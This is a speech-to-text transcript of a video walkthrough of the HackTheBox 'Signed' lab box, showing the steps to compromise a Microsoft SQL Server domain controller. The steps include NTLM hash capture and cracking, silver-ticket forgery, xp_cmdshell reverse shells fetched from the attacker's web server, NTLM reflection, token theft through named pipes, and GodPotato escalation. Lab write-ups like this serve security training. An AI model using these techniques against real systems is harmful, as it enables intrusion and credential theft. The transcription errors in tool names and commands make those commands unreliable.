HackTheBox - Signed
Skills:
Network Security80%
Key Takeaways
Exploits Microsoft SQL Server using nmap, XP_DIRTREE, and SUSER_SID to enumerate users and escalate privileges
Full Transcript
What's going on YouTube? This is IPS doing signed from hack the box which is a really cool assumed breach box that focuses on Microsoft SQL. The intended path was to use XP dert tree to steal the NLM hash of the service account running Microsoft SQL forge a silver ticket enable XPCMD shell and abuse a now patched NLM reflection technique to escalate to root. That's cool. But Microsoft SQL in general is a very tough service to secure which leads to a lot of unintended paths. here. If we forge the silver ticket correctly, we can abuse a SQL command that lets us read files as the system account. And this is how I think many people solve the box. They just read root.ext, put in the website, and consider it a day. However, there's a very old method to steal the initial token of your process via named pipes, which still has the SE impersonate privilege. So, we'll get a shell with the XPCMD shell, do some trickery with named pipes, restore the SE impersonate privilege, and that lets us use one of the many potatoes to priv. So with that being said, let's just get to exploiting some Microsoft SQL. As always, we're going to start off with an end map. So - SC for default scripts, SV numerate versions VV for double verbose. This gives us things like the TTL OA I'll put all for mask in the end map directory and call it signed. And then the IP address of 101011.90. This can take some time to run, so I've already ran it. Looking at the results, we have just one port open, and that is the Microsoft SQL Server on 1433. And then banner tells us it's Microsoft SQL Server 2022. Now the scripts failed to run. So we're not really getting any information that's the SQL NLM info and just SQL info. And then also the SSL certificate is just self-signed. So we're not getting any type of host name or anything like that. So end mapap really doesn't tell us anything at all. Now this box isn't assumed to breach. So that means we start off with a set of credentials. The username is Scott and this is the password. And I also created the file called credentials.ext text that also has this on it, but I'm going to start this off with just using imp packets Microsoft SQL client. Um, MSSQL client.py. There we go. And then we're going to do Scott colon the password at 1010 1190. And that password has some special characters in it. So, I'm going to wrap this in single quotes just so bash doesn't do anything funky. And we get logged in. Now, we're Scott and it says we are the guest user. So, if we're guest, we probably have very limited commands, right? Right. If I do a help, I can see what commands my um impact MSSQL shell gives me. And it does have things like enable XP cmd shell. But since we're guest, I'm going to go off and say this isn't going to work. See, we don't have permissions. So, we can't even do XP cmd shell to run a command. Um, if you don't know what this is, it would just stir a command prompt, run the command. Really handy for getting like a reverse shell and escaping the SQL server. But what I'm going to do next is let's see we're going to do an DB to see what databases there are. I'm looking for any custom database like a web one that may have a database of users where I could grab a password hash and crack. But this just has all default databases. So nothing really here. If we look at other commands, we could do like a links to see if this server is linked to another one where we could jump to and do anything. Nothing there. Um a new impersonate is going to give us nothing. We could try like login. Um we have SA and Scott and Scott is not disabled, not a admin of anything. So it's just a basic user. Uh what other things did we have? We had a nume users and this tells us four users. There's other ways we can get extra users which we'll show later in the video. But for now um nothing really sticks out from what commands we can do. If we do nume owner SA owns all the databases. So let's see is there anything else here? I don't think so. So what else we could do is maybe like a select at server name and that's going to get us DC01. So at least we know the host name of the box now. So I'm going to add that to my host file. So sudo v etsy host and we could say 1010 1190 is DC1. Um what else could we really do? Um, we could try like XP dur colon. We're not really getting anything, but it's not erroring. Uh, we could see if it connects back to us. So, I'm going to do nvnmp 445. We'll do that with pseudo. Run this again. We can say 101048 slash does not matter. This is just the share. And we see it does connect to us. So, what this means is we can make the SQL server, the account that's running this, connect back to us, and it does a SMB handshake. So, we can most likely steal a credential here. So, I'm going to do a pseudo um responder- ton zero. Um, I think I may have it cached. We'll see if this works. Um, does not matter. It is skipping previously captured hash. So, let's see. Um, I think it's user share. Is it responder responder responder db? So I'm just going to delete that. So we have it. Um let's do a pseudo. Rerun this. And now we'll get the hash. Um this is just because I had solved the box before and I forgot to clear that file. But we can grab this hash and then I'm going to go over to the kraken which is just a box I have on my network that I like running hashcat from. You can run it from anywhere. I don't recommend within VMs because hashing uh cracking passwords is very CPU intensive and uh if you do a VM it'll go pretty slow. So I'm going to call this sign dot um we'll do nlmv2 because that's what type of hash it is. Paste it. Then dot slash hashcat this opt word list rock.ext and it should just autodetect this hash and start cracking it right away. And almost immediately it cracks it and we get the password of this. Okay. So I'm going to exit this to get out of hashcat. Um we're going to go v creds.ext and that's mssqlsvc is the username. I called it credentials. There we go. MSSQLsvc. Put that there. And now let's go back on the box and we can try logging in. So MSSQL SVC and put in this password. There we go. Um, it failed. There is two ways to authenticate to Microsoft SQL. You have local authentication and Windows authentication. The default in this shell is Windows off is false. So, I'm just going to add dash windows off to test this. And there we go. We get logged in. We are still guest. So, we can't really do anything. Um, if we do enume users, we get a couple more users, but really not too much here. Um, let's see. An enume login. We do get a few more like anti- authority system, SQL writer. Uh, this is a group signed it. And if we look at this second column that is going to be let's see uh we have name the type disabled CIS admin. So essay is a CIS admin it is a CIS admin SQL writer win management things like that are CIS admin and that'll become important later on. Um but really not too much information here. And before we get into what we're actually supposed to do, there is one kind of important thing to understand because it's going to help us later on. Um, and that is going to be that you can enumerate users from Microsoft SQL. And I'm going to switch over to Net Exec. So I'm going to do NXE MSSQL um 1010 1190. The user is going to be uh we'll do this from Scott because this doesn't have to be privileged. So, we could do it from either user. I'm using Scott because it's the lower level account. So, you know, it doesn't have to be privileged. Do that. Let's see. Does it log in? It's thinking about it. I don't have a typo in the IP. Login failed. It says try a local O. So, we'll try that. NetX's default is Windows O, I think. So, that's why we had to specify that. But here, if we do -h, we have RID brute. So, I'm going to run this command. And we may have to give it a max R ID. Um, I'm not sure. I think the default would be like 4,000. Let's see what happens. So, we get Scott. It's going to log in and hopefully it starts dumping a bunch of users. Uh, it failed. Timeout. Let's do 2,00. There we go. So, here we go. We're dumping a lot of information and we get a lot more users than the Anume users and the MSSQL shell gave us. And this piece isn't really that important. Um, we do see the domain name is signed. So, it's by DC1.signed.htb is most likely. But what is important is understanding how this works. Because in Microsoft SQL, if you ever get the password of the account that is running it, which we did through that um XP during getting the NLM hash, cracking it, we can do something called the silver ticket attack. In order to do the silver ticket attack, we have to get information from the Microsoft SQL Server such as the SID. And the SID is pretty hard to get um or at least not intuitive. So if we go back to this shell, we can run the command select s user SID and then give it the name of an account that exists. I'm going to do administrator because administrator is always going to exist. And I'm also going to specify the um domain. So we'll do signed back/administrator and we get this. Um if you don't know how to get the domain, let's see. I want to say if we did select default domain, that's a command, right? Yeah, that's signed. So, I'm doing this because we know this exists. And this will get us this number. This is just the SID in a different format. Um, I want to say it's binary format, but this is relatively a pain to um convert back. The best way I found is just looking at how Net Exec does it. So, if you do Netex Exec GitHub, let's see. And if you ask AI, AI is going to do it for you as well. But I find understanding the red brute force is what kind of led me down this whole path of understanding how all this works. So that's why I'm showing it this way. Um what we did we did a RI brute was the command right. So I'm going to search for that and we see it's in this protoorggs. So let's see I'm going to search maxrid because I want to see exactly where it is in the code that this is used. And just searching red brute didn't tell me. But if I add, let's go with one of the arguments that this uses. There we go. Protocols Microsoft SQL red brute. And this is going to tell me exactly how that works. Uh we can probably close that. Make this a little bigger. We see it's going to do a select default domain. That's going to get us um signed. We already showed that. Then it's doing select user SID the domain domain admins. So net exec by default is going to always check the domain admins. We did administrator. it really doesn't matter. And then they use this command, the SID command, and they give it all this. So, let's go ahead and see where this is pulled from. So, if I scroll up, we see SID is right here. It's part of impact. So, let's go back to a shell. I'm going to do um we'll do a new pane, Python 3. We will import that. And then I'm going to just grab this again real quick. I'm going to call this raw SID. Raw SID, I guess. Sure. Wonder if I should put that in bytes or string is fine. Uh, let's see. Okay. See how this is used. So, we do SID bytes from hex. So, we'll say SID. Oh, we don't want to do that. Um, I'll say admin because that's administrator SID is equal to bytes from hex the raw SID. What is this? That does not feel right. Oh, we need to specify SID to convert. There we go. Okay, that is a SID object. And it has this format canonical. So we're going to add that. I should have called that admin SID, but there we go. Now we have the human readable SID. So that's how we can grab it. We just do bytes from hex. Give it this weird thing and then the format canonical. And that will get us this SID. And this is how the um RI brute is working, right? We can go down a little bit to see exactly how this works, but it's doing a select s user s name the SID binary and then giving it this format. So we could try select s user I think it was s name and then was it SID binary next sid binary and then it does capital N. Paste this in. Close that out. And there we go. So this is going to be the domain SID and then this is going to be the identifier and all the id brute force is going to change that number and we can just increment it right I think the default Microsoft uh group starts at 500 so that's that um once you create accounts I want to say it's 1,00 or 1100 uh 1,000 is DC01 Uh let's see is it 1100 is where user start there's DNS update proxy there's Microsoft SQL service so this is all the RI brute is doing is really just going through and incrementing this and getting all the users right so why did I show this because this piece is going to be very very important I'm going to copy that real So, let's see. Um, how do we want to do this? I'll create a new pane. I'm going to call this gen ticket.sh. So, we're going to do ticketer.py. This is going to be another impact script. I'm just doing it in this to make it easier for you to see all the arguments, right? So, to generate a silver ticket, we'll need the SPN. This is the service principle name. And it really doesn't matter. This could be anything we want it to be. Um, at least I found in my testing. The default is probably going to be the username then slash uh the machine it's talking to or machine it's for. So Microsoft SQL Service is probably going to be this. If your account's running as something different, that may be different, but the SPN does not really matter. So I'm just going to put my money where my mouth is and say does not matter slash this. But you need to have it. It's weird. Um domain SID that is going to be this. Uh we need to add the dash SID. And then what do we have? Um the domain is going to be sign.htb. And then we have to give it the nt hash. I don't think ticker. Uh let's see if it does it. Maybe it's changed nth hash. So we have as key nth hash. Nope, it doesn't. It doesn't have an option for um putting in a password. So we have to generate the NLM hash for this um manually. You could just Google it, but uh it's relatively simple to create an NLM hash. It's just an MD4 sum. So I'm going to do echo-N paste this in. Then we want to convert this to UTF 16 little Indian because that is what like most window stuff is. Is that it? Um does that matter? That looks like it is. So I don't think we even need that dash. Huh. Okay, that's fine. And then what do we have to do? We have to do a MD4 sum. I don't have it there. Maybe open cell MD4. Uh we can do the legacy provider. Uh provider legacy. There we go. So this is going to be the NLM hash. And of course you can just go online and Google like plain text to NLM and get it that way. So there's the hash of it. And then we have to do um groups. So since we're doing the silver ticket, this is going to be what's in the Kerros ticket. We can say whatever we want. It's not going to go back to the domain controller to validate it. That's the whole point of a silver ticket. We just forge the ticket. Um so what I want to do is get the group of um domain administrators. So let's see. We can probably do a select s user sid sign.htb. We don't needh um domain admins. Right. There we go. Grab this. Go here. And let's see. Um, how can I do this quickly? We'll do SID bytes from hex. Paste this in dot format. I'm going to pronounce attempt to pronounce that again. I screwed something up. Let's see. I forgot a parenthesy. That's going to crash. There we go. So, this is the domain admins um SID. So, I'm going to add 512. I'm also going to give it domain users, which is 513. And then, um the user ID for administrator is always going to be uh 500. That's the like rid account. Um, we could also just show that, but it'll take a second to do. So, I'm just going to handwave that part and assume you just trust me. If not, then go back to what you saw. Add signadministrator. Look at the SID and you'll see f it ends in 500. So, this is going to give me the ticket I want, right? Yeah. So, let's just do bash gen ticket. And there we go. We have a administrator Ccash file. So let's do KB5 CC name is equal to administrator.CH um msql client.py-k for keraros 1010 11190. Is this it? Let's see. It's taking a while. Uh that did not work. car 5cc name. What did I screw up here? It attempted to authenticate, I think, and we don't want it to. K5 CC name. I wonder if there is like that. No, that doesn't look right. Yeah. I see cache file not found. So, it's definitely not that. Oh, wait. It's Keraros. We can't use IP addresses. Um, we have to use host names. I'm guessing we have to add the full um name, which will be d1.sign.htb. But we can test this real quick. Yeah, that doesn't seem to be working. Let's do pseudo vets host. And then we can say sign.htb and dco1.sign. signed.htb. So what's happening here is kerros is very very very picky. Um in the actual kerros ticket that we generated we said this ticket is for dco1sign.htb essentially. So unless the rhost is set to that um it's not going to authenticate us. So there we go. Um now we are assigned/administrator. So you can see we forged that but we're still only guested. Um and the whole reason we are only guest let's see if we do a new login this is going to show us all the login and at no point is administrator a um cisadmin we have signed that is going to be um is cisadmin that's what this second column is so we want to be a part of that windows group so let's close out of this and then we want to go back here. We can say signed ID. Grab this. Go to this window. Get the SID. That's going to be 11:05. So, let's go back into my gen ticket. I'm going to do groups 11:05. Save this. We will run it again. And now when we connect, we're going to tell it we're a member of that IT group. And the SQL server is not going to validate it because again, this is a silver ticket. And now we're DBO at master, which means uh we're now CIS admin. And we can do X enable XPCMD shell. And there we go. Uh we change from zero to one. And now we should be able to do this. Who am I? And there we go. We have finally got code execution. Now, I'm missing some things here right now that we're going to get into at the end of the video. But right now, I'm just showing the intended path all the way to the end. And then I'm going to show some other cool things we could do from this uh SS SQL shell if we played with our ticket a little bit more. So, don't worry, we'll come back to this, but I want to show the intended way. So what I'm doing now is I'm going to create a um web directory so I can easily just run commands on this. Um I want to get a reverse shell. So I'm going to copy user share nang um shells and then invoke PowerShell TCP oneeline.ps1 and call it shell.ps1. And you don't need to use a web cradle like I am to do this. We could just run the PowerShell raw, but I find the web cradle is very handy because it lets us change the uh file up without changing our SQL command. Also, it will tell us if AV is at play because it'll make a request to a web server. Then, um if we never get the shell after that, chances are we have a typo here or AV killed it. If we just tried to encode the script and run it all at once, we never know like if it's running or not. So having that web request come out to us to tell us hey it ran is a very very good thing. Um so let's do this. So this should get me a reverse shell. Um what we have to do is echo nix new object net.eclient download string http 101048 8000 shell.ps1. And let's see, I used those single quotes twice. So, we'll change those to doubles. There we go. I'm going to do I convert UTF16 little Indian because it is Windows. It loves being in that format. B 64 W0. That puts my whole string on one line. So, I can easily just copy this. Let's do Python 3 HTTP server. I'm actually going to do that up here. We'll keep our shell at the bottom. Okay. RL wrap netcat LVMP 90001. If I can type that would be great. And now we can do the XP cmd shell PowerShell encoded command. Paste in our B 64. And let's see 44 not found. because I'm not in the dubdubdub directory. There we go. And we have a shell. Hit enter. And we get the prompt here. So the first thing I always run when I um get a shell from a service is who am I/priv to see if we have that se impersonate privilege and we don't. And the step here in order to do it is relatively tough. It's going to be a cross protocol reflection attack that takes advantage of a cred marshalling bug. It was shown in the Dark Corp machine and I probably explain it better. So check out that video if you want more. However, this was patched around a year and a half ago. So I don't want to spend too much time on it in the ways are so much cooler and have been known for at least like 6 years without being patched. Um I want to say let's see this is probably I think CVE 2025 uh 33073. If you want to know more, let's see. Uh, loopy ticket. There should be a senactive post about this, right? Uh, let's see. Senactive. Yeah. So, I would look at like this presentation um because I'm want to say this is it. Yeah, this is going to be it. And we need this eventually. So, uh, what we'll have to do is be able to create a DNS name because, um, we can essentially take over a name. Um, I'll explain it as I go. That'll probably make most sense because first, we have to be able to create a DNS name. Now, I could probably just do this through the PowerShell commands, but I want to do it all in my box because I'm going to set up a complex tunnel anyways. So, let's go ahead and start that process. Um, I'm going to copy optisel chisel.exe over to dubdubdub. And then I also want to standup chisel. So we'll do optisel chisel. And the reason I'm doing this is because we don't have any of the SMB ports exposed. Um, we just have MSSQL. So, we're going to set up a proxy so we can access the uh ports related to active directory and we can use the credentials we have to um create an account. So, we'll do reverse listen on port 9000 and we want to use sock 5. There we go. And now we can do cd back slashprogram data. This is just a directory that I know I have read write to. Uh, we can curl http 1010148 8000 chisel.exe out chisel.exe. This should download, right? Yep, that is. So, we can do dot slashchisel.execlient 101048. Uh, we did on 9,000 and we want to say socks. So, here we have now set up the tunnel. So now we can um do a pseudo NC we don't want to do pseudo we want to do proxy chains NC um 10 104 n uh 1190 and then 445 I'm going to add a ZV lowerase V. We can see we can now connect. And if you can't um your proxy chain config may not be set up correctly. We can look at it. I just have socks 5127001 1080. If I look at chisel, we can see it is listening on 1080 for that sock proxy. So now that we have this, let's see, we want to be able to add that DNS name. So, I'm going to do uh we have to get um a tool. It's in Kobe Relay X GitHub. And we'll also need to use code ro relay as well. So, this is a package we'll definitely need. So, I'm going to do a get clone on this. And let's do Python 3 create our virtual environment. There we go. go in here. Uh, I know we need to install impact. So, I'm just going to go ahead and do that. It's starting the install. There we go. So, I should now have a tool called DNS tool, right? Yes. So let's do DNS tool- u signed and we'll do MSSQL service-p that is purple. So we can go ahead and grab this and then um a add the record is going to be d1. Then I want to go to this and grab this. This is going to be the magic string that essentially when it gets passed to a cred marshalling service, this resolves to nothing and then it comes back to DC1. So what we do here essentially is we create this record, it points to us. So when someone queries that record, they get our IP address. However, when Kerros is doing the validation, it goes through a cred marshall process or unmarshall. I don't know exactly the terminology, but when it does that, this piece gets chopped off because it resolves to nothing and they're left with DC1. So, whoever we're talking to thinks we're DC1 and that becomes handy because we get DC1 to make a request to us through this. We chop that piece off because the cred marshalling. We reflect that request somewhere else. And now we can impersonate DC1. Um, again, check out the Dart Corp video if you want um more of an explanation. So, let's see. That record is going to point to 1010148 and the boxes IP 1010 1190. Uh, we will have to use proxy chains. Uh, let's see. No module name crypto. um pip 3 install cryptodome. Whenever I see a crypto error and impact it, I always just go ahead and install the pi cryptodome package. Um I think that's normally right. Yep, there we go. So we have added that record. So this host exists and it points to us. So now what we have to do is set up the NLM relay. And I'm gonna have to do this as root because if you do it with um if you use pseudo, it's going to break proxy chains. Um and also if you just like give Python the capability to listen on port 445, it's also going to break proxy chains. So it's always best here to switch to root. And then we can go back into our environment. Go in KB relay X. We can say proxy chains NLM. Oh, we don't have um Do we have NLM relay? Yeah, we do. So, we can say proxy chains. I'm not using Kobe relay. I'm using NLM relay. And if I didn't go into this, um, my impact is at impact nlm relay as my root user. If I ran this, it is going to be version 11 from 2023. And the feature we're using comes in packet version 13. So that is why I'm just going to go to where I have impacted here relay X and we can see now I'm running version 13 here. So we'll do NLM relay X. We can do proxy chains. This the target is going to be win RMS. This is what was added in version 13. So 1010 1190. So what we're doing here is taking an NLM connection and then reflecting it to this endpoint which is going to be winrm. And we also need to add SMB to support. There we go. And now we can use net exec I think to coersse this. Um so proxy chains net exec smb dco1 sign.htb http username my SQL SVC mss yep that is right dashp let's get that password again grab that paste awesome and then if I do dash capital L that's going to give me a list of modules I can use and the module we want um let's See is it here we go we want to use coerc plus so we can say dash module co plus I want to say d- options lets us see the options of a module it is so these are the module options we have so what we'll want to use is dash o for options and we can say l is equal to that's going to be that DC01 string we created. There we go. So what we're doing here is doing coerc plus and we're telling it to connect to this host. And this is important because again it has to when the server cred marshals it just has to be d1 and this string will get chopped off. Um again I show that in dark corp um exactly what happens um let's see the method I'm going to use petite prom the first one I think that I think print a bug also works maybe shadow would work as well but I know petite does um these are just ways to like force a service to make a request so we're right now forcing the system account of DC1 to make a request through the petite POTUM method and it's going to make a request to this which is going to resolve to us. So it's going to make a request over um SMB 445. We're going to hit this NLM relay here and we're going to forward it over to win RMS 5986 and then get a shell. So let's run this. And if this doesn't work, maybe I have to create the domain name again because it may have automatically got cleaned up, but we'll see. So, it is now running that. It says it is vulnerable. Exploit success, but we don't have a shell. So, I'm going to add that host name again because maybe something cleaned it up because I was too slow. Let's try running this again and hopefully it works. If not, I have a big issue somewhere. Um, I have an issue. That's not good. Ver. It says it's vulnerable. Let's see. I'm going to copy this. We'll go. Let's see. Where do I have a shell? I don't think I have a shell anymore because that's running Chisel. So, let's do NCLVMP 90001. I'll probably kill this without killing my shell. Please run this again. Hopefully that comes back. Connect back. That's annoying. We'll copy this command. All I want to do is ping that weird domain name to make sure it resolves back to my box. Oh, it did connect eventually. There we go. So, let's go back here. We did DC1 this. Where is that shell? What if I add sign.htb? Nope. So that is working. So we ping this. It added the sign.htb. It does go back to us. So is my ntlm relay command wrong? We do proxy chains. NTM relay. Target is winrms. That looks good. That is the box. Do we have to give it the host name? I don't think so. Let's see. Pseudo TCP dump it zero port 445. Don't do DNS. Oh, we're going to get hits because we're doing net exec on 445 as well. Are there any other options for this? No, we'll just run it again. Okay, I just ran it again. I don't think I changed anything, but it magically worked when I was setting up to try to debug. Um, we can see right here we got some output winrms started interactive winrms shell on this socket 127001 on port 1100. So let's do netcat 127001 1 0 0. And if I do who am I? We're ent authority system. So we can do cd users administrator desktop and then users administrator users or is this shell just stupid? I think that shell is just really stupid and doesn't have like command history like the change directory is not working. But that is one way to do the box. So I guess the lesson is like if the command doesn't work just try it again. I'm not sure exactly what changed between attempts but something did. Um, however, there is a much cooler way to root this box. So, that's what we're going to dig into now. And I'm just killing Chisel and we're going to um just get back to a clean slate. I can probably close all my windows and we'll get back. Let's see. We don't need this. I definitely want to keep that. Having that SID thing is definitely handy. So, okay, let's look at that gen ticket command again real quick. So, we're doing the SPN does not matter. Uh, we're giving it the domain SID, the domain, the password hash of the service account that is running Microsoft SQL and we need that because that's what's signing these tickets, right? Um, we got domain admins, domain users, and this is signed the RID of administrator and administrator. So if we run this, we can do that. And then let's see, MSSQL um KB5. That should be fine, right? That gets us a shell. So um there is a command select star from open row set. And this is going to read files on the box, right? So we could do C colon backs slash um users. Let's see. MSSQL SVC desktop user.ext. I think that's where this is. Um, if you go to like a Microsoft um SQL cheat sheet, this is a common way to read files. Uh, either impersonation was not invalid. Let's see. Um C colon is it Windows system 32 license.rtf. So something is wrong with this. I was actually expecting to be able to read this file, but maybe I can't. Um let's go ahead and copy that. Exit. Um actually we need to get one more R ID. Uh select S user SID MSSQL SVC. It's this copy paste. There we go. 1103 is the SID for the Microsoft SQL Server. So let's go ahead and become that user. So V gen ticket user ID is going to be 1103 and I'm going to call this MSSQL SVC. Okay, this gets in. So now let's just go ahead and copy this as contents. Okay, now we can read that file. So since we're impersonating the MSSQL service account and not administrator, it's going to let us become whatever process is using to run Microsoft SQL. Um it's weird that it works this way, right? But now we should be able to do C colon um users MSSQL SVC desktop. I think user.ext is here, right? Yeah. And we can also do C col users administrator user.ext. Uh that's going to actually be root.ext and get that. So we can get both those hashes. Now I know what you're thinking. If we do XP cmd shell, we should be the administrator user because we're reading their files, right? We do who am I, we are not. If we do who am Iall, um we still only have those four privileges. We don't have a way to um impersonate. Um if we got a shell and try to go in administrator, we can't because um the way it's starting a process is killing the way we impersonate to become administrator when we um run this command. Essentially the parent process is a local service or local system, I'm guessing, that can read this file. However, whenever it does a process start, it downgrades us to the user that is running it, and we lose a lot of our permissions. I'm going to show how to get the impersonation back at the very end of this video. But another file we could read that is interesting would be administrator and then uh what is it? Um, app data roaming Microsoft Windows PowerShell PS read line console host history.ext. Please say yes, that is. And this is the PowerShell console history. So, I'm going to copy all of this. I want to say if I just do a print f, it'll work. print f um maybe I should just copy the whole thing and put it in Python because it's a bit pain because we have those like back slash R and back slashn right but let's see that is a binary string so if we do python Just looking at a better way to view this test is equal to that. That test decode. That did not do it. I was hoping it would have done the back slash ends. Um, the easiest way I guess would be just to use said. Um, and I know OXDF is going to watch the video, find a better way to do it in Python, but oh well. Uh, let's see said S like this. And I think I just do back slashn, right? There we go. That is better. So, these going to be all the PowerShell commands. And let's see. We go through they're installing the SQL server getting service any IP there should be a password right there we go set AD account identity administrator new password and it gives us the administrator password so then we could use this password with um like chisel or something like that to get a shell as um administrator there. I wonder. Let's see. Exec as user help. I don't know how to run this command. I was wondering if that would enable us to, but no, if we still had Chisel running, which I don't because I killed and I'm too lazy to start it back up. You could just use psex with this password for administrator and then um your shell. I wonder if I don't think this is going to work, but I don't know. I can't imagine cuz the silver ticket didn't work. And we're doing pretty much the same thing. Um, it doesn't hurt to try. Administrator this at that not found. Wonder have to add sign administrator. Huh? I know this is the password. I thought it was. I'm fairly certain. Administrator. I may have to go get Chisel on this box and double check this before publish the video. Yeah, that is definitely the password um for the local account. I guess I guess I don't want Windows off. There we go. Okay. Um, and we're a guest at master. I'm pretty certain, uh, the open row set's not going to work here. Let's see. Root. Grab this. Yeah, we don't have permission because we're guest. So, if we had chos still up, we could use ps exact get administrator that way. But the cool part is we could use a really old trick and restore our privilege. So, I want to go back. Let's go back to the gen ticket. Let me look at this. We're going to be MSSQL service. That is good. So, we'll just do this. And then I want to KB5 get a shell. And let's do XP cmd shell. Uh, do I have encoded command up here? I don't. I got rid of that. Dub dubdub. echo- nix new object net.web client. I bet Net Exec has something to get me a shell I should just use, but oh well. Already down this road PS1. Let's just do this. I convert UTF6 little Indian B 64 W. Oh, I missed the dash T. There we go. I'm really shooting myself in the foot by closing all my windows earlier. Oh well. PowerShell encoded. Paste that. Got to make sure we're running the service. There we go. So if I do who am Ipriv, we don't have any advanced privileges. Um so let's see if we go to a really old post. Um let's see. Sharing log on session little too much. Do this. there's this post and essentially what it tells us is um we can start a named pipe and then when we create a job to have it connect to that named pipe it's going to use the very first token that process had to connect the pro pipe and that is how you can imperson um you can steal that token and this is mainly big for like network services so like when you get a shell from MSSQL maybe examping if your shell doesn't have the SC impersonate by default. So, um the key piece is what is it? NT, they have a library here that they don't really talk about in this post. Maybe it's in the previous NT. Yeah, NT object manager. This is a bit of a pain to get, but it's definitely something that is super good. Um, I'm just going to search GitHub NT Object Manager. It goes to a project zero. And what you'll want to do is download this to a Windows machine or clone it. Open this in Visual Studio, then compile. It'll probably take me like five t minutes to do, so I'm not going to show that. But when you compile it, you're going to get a um directory structure and probably release bin that is going to look like a zip I'm about to just copy over. Um so let's do n object manager. We'll copy this file over. And I forgot I wanted to show one other thing I had tried. It did not work, but I'll guess I'll show it at the end of the video. Um so this is going to be a zip. Let's go. CD program data uh curl http 10 1048 8000 this start this up. We're going to download and then I can do what is it? expand archive destination. Is this it the destination path? I don't even know if I need that. Yeah. So, we've unzipped it. So, this is the script list that you're going to get if you just compile it and go into the bin directory. Um, and we can import this module and that's going to give us all the functions we need to pull off this attack. So, we can do import module I hope the big downside here is the reverse shell I'm in doesn't have standard error. Um I wonder if I do two one. Yeah, I don't know how to restore that. Um I probably have to fix the reverse shell script. So um if anything fails, uh we won't know which sucks. But um yeah. So what I'm going to do is pretty much run through this post real quick. So, going to create a new um named pipe. And this could be anything. It's just going to be what it's called ABC. And I want to say is the fighter video. I've done this uh fighter. Let's see. I know I've done named pipes before and it was a really long time ago. Um there we go. Probably Hackback is what you'd want to watch if you want to learn more about named pipes. Um but anyways, we create this named pipe and then we're going to start a job which is going to just um make this pipe listen on the back in the background. Um so if I do job we can see is it completed already? I don't know if it should be completed. Um I thought it'd be running but oh well. Let's just get this NT file. And now I don't think we need a weight job. We should just be able to do this. It's going to be multi-line. Um let's just say token is equal to use NT object type. Then get ent token impersonation. There we go. Token. Yes, I have a token. So if we do token dot privileges, we can see this token has se impersonate which is awesome. Um so if I do who am I all uh priv right now you can see this process does not have um se impersonate but if I do a new win32 process command line who am I/priv to c program data um what is it altext I guess we'll just do and then give it the token Now we can do type C colon program data out.ext. Uh that did not work. Command line status weight. Why did that not work? That definitely should have. C colon backslash. Can we do double backslashes? Is it like getting terminated? It's not giving me any output. do. That file may not even exist. Actually, something weird is going on. C program data. Just going to do ZZ because that would go to the very bottom of this list token privileges. I don't know what is going on here. cmd slash C. Let's put this in a single quote. Double quote here. Okay. Um when I did it through Oh, I know what went on. Um this direction is probably part of command prompt. So when I was just joining the who am I binary, it did not understand this. That has to be what happened. Yep, there we go. So now we have the SEM personate privilege. So what does that mean we can do? Well, let's go ahead and get a reverse shell as this. So we'll do PowerShell enc. You can do it in a new shell. run did not give me shell cmd C. Maybe that wasn't the issue. Maybe it has something to do with like argument argument parsing. I don't know. Uh that's still Not working. Encoded command. That definitely should work. This XP cmd shell PowerShell Coded command. I think my encoded command is wrong. Did I not copy everything? Let's copy that whole thing and let's delete Word. Uh, we're not getting any output from this. That does work like the win 32. Oh, uh, we need dash token. There we go. Still not getting our shell. Did I do a cmd.exe before? Okay, let's just see if we can do what we did before. I don't know what's going on with my PowerShell shell. Uh, who am I to Zon program data zan annoyed? That is pending. So that definitely works. Who am I? I should have done a different command. Um, h first name. So that definitely works. Encoded command I wonder if there's like a number of characters we can send and that's screwing us up. I really didn't expect this piece to be the piece that takes forever. Do that. Close out the single quote. Oh, where are you? So, it definitely errored. PowerShell doesn't like how we're passing the argument. No profile. Okay, let's just see. Um, curl http 10 10148 8000 shell.ps1. Maybe this will work. PowerShell C program data shell.ps1. There we go. I don't know what the encoder command thing was doing, but now we have a shell. We have seen impersonate privilege here. That was a pain. Um, so now I'm just going to do god potato because this lets me get a command really really easily. Let's just go ahead and download this. The simple things you struggle with sometimes, but it's always handy to know like ways out of it when you get struggling. Copy link. We will w get this move god potato. I'm just going to put it in dubdubdubg.exe. exe program data. And if we try diirc users administrator desktop, um we still can't access this. Again, we don't have standard error. So, um we're not seeing anything here. Uh curl http 10148 8000gp.exe. run it and all we have to do is gp.exe command who am I and we're empty system. So let's go ahead and listen on 9001 gp.exe cmd PowerShell C program data shell.ps1 PS1. There we go. Users, administrator, desktop. And there we go. We can get root.ext this way. So, I like getting this way of getting my SQL shell um to prek more than the intended way because we stay within um MSSQL the entire time, right? So, it really fits the theme instead of just doing that um old CVE. Well, it was new at the time when this box released, but the active directory CVE, I like staying within Microsoft SQL the entire time. Now, when I was solving this box um or trying this to find it, it took me a while to find um this post. I actually talked to Cody Control0 over at Hack the Box, and he's the one that pointed me this way. Um, but before that I was trying to find a a lot of different ways to um run code, right? We knew the XP cmd shell just did not work, right? Uh, well, it worked, but we couldn't be administrator, right? So, I was thinking, huh, is there another way we can um execute code on Microsoft SQL where the parent process is permission? Because obviously when we did that um open row set with bulk, we were able to read root.ext from the Microsoft SQL shell. Um let's see. Root.txt. Do I still have that command here? Yeah. Right. So obviously we have administrative privileges somehow. But when we did XP cmd shell that got dropped. So I remembered when solving I want to say it was dark corp um we did a Microsoft SQL pivot and that launched a uh CLR process. It was another way to execute code. Um let's see if I add this. Oh am I not going to be able to find this now? Um maybe my SQL proxy CLR. Yes, this one. So on a box a long time ago, we used MSQL to launch a proxy. And if we follow this chain, it kind of talks about exactly how to do it. Um, I think this Net Spy article is better that they referenced. So they load a CLR assembly and I thought maybe hey maybe XP cmd shell can't do it because when it does like process.st start right here maybe this is what's dropping our privilege. So I gave this over to AI that script and I just said hey I want to replicate this but only read files because in my mind if I only read a file then there's a higher likelihood my process privilege isn't uh being dropped and also um all this is doing is reading a file right maybe I have somehow permission to read files but not run commands so that's why I kept it limited to reading files and AI ended up giving me a and I'll copy it here real quick. So, I'll put in dubdubdub and then I'll go in and view the file. So, here it is. It's just a stored procedure file path. We read all and then we send the content back. So, that's very similar to this, but I just wanted to dumb it down to only read files. First I did this whole thing and when I did my XP or this was cmd_execute creates a command as but when I did this I still was um the SQL service right so I thought hey let's try just dumbing it down and that's what I just want to show real quick it doesn't lead to anything but I found this research um pretty interesting and also like when solving these boxes I go down like 50 paths and you're only seeing the correct path so I just want to show more of just going down random paths, right? So, let's see. Um, do I still have that XPCMD shell here? I do. Dubdub Python 3 m HTTP server. One of these times I won't uh kill my shell, but that 